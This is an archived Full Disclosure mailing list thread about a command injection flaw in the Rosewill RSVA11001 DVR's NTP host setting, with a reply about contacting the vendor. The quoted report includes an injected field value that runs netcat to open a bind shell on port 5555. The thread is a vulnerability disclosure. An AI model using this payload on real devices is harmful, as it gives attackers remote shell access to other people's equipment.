Full Disclosure mailing list archives
Re: Fwd: Remote command injection vulnerability in Rosewill RSVA11001 (Hi3515 based)
From: Eric Urban <hydrogen18 () gmail com>
Date: Mon, 25 Mar 2013 11:12:35 -0400
Rose will just responds to me with engrish when I email them. I have no point of contact for hi silicon. I would gladly assist the manufacturer in addressing this hole if put into contact with the right people. On Mar 25, 2013 8:56 AM, "Henri Salo" <henri () nerv fi> wrote:
On Sun, Mar 24, 2013 at 05:43:43PM -0400, Eric Urban wrote:I have been hacking on a Rosewill RSVA11001 for a while now, something to suck up my free time. I had pulled apart the firmware previously but did not succeed in finding a way to get a shell on the device. The box is Hi3515 based, I found an exploit for another similar box (Ray Sharp) butitdid not work. The Rosewill firmware seems to use an executable thatlistenson two ports rather one when communicating with the Windows-based control software. Port 8000 is now the command port rather 9000, 9000 is used for video only. After playing with the included Windows application I eventually did a strings on the 'hi_dvr' exectuable that is the userspaceprogram that controls the interface to thing. I found this gem: /mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp So I used the windows software to set the NTP host to a;/usr/bin/nc -l -p 5555 -e /bin/sh&Did you report this to the vendor? -- Henri Salo -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAlFQSZIACgkQXf6hBi6kbk/jpACePQuP3jtEBZe+YzVZ2y0zXSNW YPcAoLQAmb9yBU14PRpI8RKCeE+XjRfG =bybp -----END PGP SIGNATURE-----
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Fwd: Remote command injection vulnerability in Rosewill RSVA11001 (Hi3515 based) Eric Urban (Mar 25)
- Re: Fwd: Remote command injection vulnerability in Rosewill RSVA11001 (Hi3515 based) Henri Salo (Mar 25)
- Re: Fwd: Remote command injection vulnerability in Rosewill RSVA11001 (Hi3515 based) Eric Urban (Mar 25)
- Re: Fwd: Remote command injection vulnerability in Rosewill RSVA11001 (Hi3515 based) Henri Salo (Mar 25)